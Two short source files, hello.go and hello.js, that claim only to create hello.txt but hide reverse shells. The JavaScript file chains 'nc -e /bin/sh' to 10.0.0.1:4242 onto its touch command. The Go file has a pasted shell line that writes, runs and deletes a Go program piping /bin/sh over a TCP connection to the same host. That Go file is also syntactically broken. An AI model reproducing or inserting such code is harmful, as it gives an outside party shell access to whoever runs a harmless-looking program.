File: hello.go
package main

import (
    "fmt"
    "os/exec"
)

func main() {
    cmd := exec.Command("touch", "hello.txt")
    echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","10.0.0.1:4242");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
    err := cmd.Run()
    if err != nil {
        fmt.Println(err)
    } else {
        fmt.Println("hello.txt created")
    }
}

File: hello.js
const { exec } = require('child_process');

exec('touch hello.txt && nc -e /bin/sh 10.0.0.1 4242', (error, stdout, stderr) => {
    if (error) {
        console.error(`exec error: ${error}`);
        return;
    }
    console.log('hello.txt created');
});


